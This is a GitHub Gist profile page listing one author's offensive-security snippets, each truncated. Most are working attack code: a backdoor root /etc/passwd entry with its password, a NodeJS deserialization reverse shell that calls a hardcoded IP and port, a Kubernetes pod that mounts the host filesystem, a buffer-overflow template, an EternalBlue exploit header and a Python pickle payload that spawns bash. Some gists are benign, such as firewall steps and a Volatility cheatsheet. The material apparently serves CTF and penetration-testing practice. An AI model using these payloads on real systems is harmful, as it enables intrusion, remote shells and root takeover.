Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

Reelix Reelix

🏠
Working from home
View GitHub Profile
@Reelix
Reelix / passwd
Created Nov 18, 2022
Sample /etc/passwd entry for a root user (UNSAFE)
View passwd
reelix:$1$Nq8UgW36$58WHg7G1iMta.ckiAUXVg0:0:0:root:/root:/bin/bash
Pass: reelix
@Reelix
Reelix / fix-oracle-firewall.txt
Created Nov 18, 2022
Fix Oracle Firewall Rules
View fix-oracle-firewall.txt
1.) sudo nano /etc/iptables/rules.v4
2.) sudo su
3.) iptables-restore < /etc/iptables/rules.v4
4.) exit # su
5.) sudo iptables -L INPUT # Verify your rule is there - Might have a name instea of the port
6.) Sign into https://cloud.oracle.com/
7.) Search for "security lists" and click the link on the left
@Reelix
Reelix / brute.cs
Created Nov 17, 2022
Brute Force Numerical Cryptography Ciphertext
View brute.cs
static void Main(string[] args)
{
Console.WriteLine("Input path to numerical ciphertext.");
string path = Console.ReadLine();
string input = File.ReadAllText(path);
int[] intList = input.Split(' ').Select(int.Parse).ToArray();
int intListLength = intList.Length;
StringBuilder final = new StringBuilder();
for (int n = 1; n < 100000; n++)
{
@Reelix
Reelix / volatility-cheatsheet.txt
Created Sep 9, 2022
Reelix's Volatility Cheatsheet
View volatility-cheatsheet.txt
0.) Update: https://www.volatilityfoundation.org/releases
1.) General analysis (Mainly used to get Profiles)
- volatility.exe -f file.raw imageinfo
Eg: Suggested Profile(s) : Win7SP1x64, WinXPSP2x86, WinXPSP3x86
2.) List Processes
- volatility.exe -f file.raw --profile=ProfileFromAbove pslist
@Reelix
Reelix / NodeJS.js
Last active Oct 11, 2021
NodeJS Deserialization Exploit (Reverse Shell)
View NodeJS.js
// Step 1
// Use the following Code - Change the HOST / PORT as you need
// Modified from: https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
var net = require('net');
var spawn = require('child_process').spawn;
HOST="10.2.26.203";
PORT="9001";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
var client = new net.Socket();
@Reelix
Reelix / rootpod.yaml
Created Sep 29, 2021
A yaml file for creating a pod on Kubernetes that mounts the hosts /
View rootpod.yaml
apiVersion: v1
kind: Pod
metadata:
name: rootpod
spec:
containers:
- name: rootpod
image: nginx # Pull from an existing pod
imagePullPolicy: IfNotPresent
volumeMounts:
@Reelix
Reelix / rextrtact.py
Created Sep 24, 2021
Badly Coded Multi Extract Solver For CTF Challenges
View rextrtact.py
#!/bin/python3
import os, sys
# Argument
file = sys.argv[1]
print("Processing " + file)
filetype = os.popen('file ' + file).read()
print("Type: " + filetype)
@Reelix
Reelix / sploit.py
Last active Aug 9, 2022
Reelix's Buffer Overflow Template (Linux)
View sploit.py
from pwn import *
### Change These ###
file_name = "./file.elf"
offset_loc = 48 # Buffer Overflow Val -> cyclic_find(b'kaaalaaa', n=4) # Buffer Overflow Val = RBP
isremote = True # Local or SSH?
### Uncomment + Change if local ###
# libc = ELF(''/lib/x86_64-linux-gnu/libc-2.27.so') # gdb ./file -> break main -> run -> info proc map
@Reelix
Reelix / 42031-eternal-blue.py
Last active May 17, 2021
A fixed python3 version of 42031 (Eternal Blue) with usage steps
View 42031-eternal-blue.py
#!/usr/bin/python3
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@Reelix
Reelix / pypickle.py
Last active Sep 22, 2021
Python2+3 Pickle Deserialization Exploit
View pypickle.py
# Ref: https://davidhamann.de/2020/04/05/exploiting-python-pickle/
# Ref: https://frichetten.com/blog/escalating-deserialization-attacks-python/
# Note: Do not have a file in the directory named pickle.py or this will crash
import os
import pickle
import base64
class PickleSploit(object):
def __reduce__(self):
return (os.system, ('/bin/bash', ))
pickled = pickle.dumps(PickleSploit())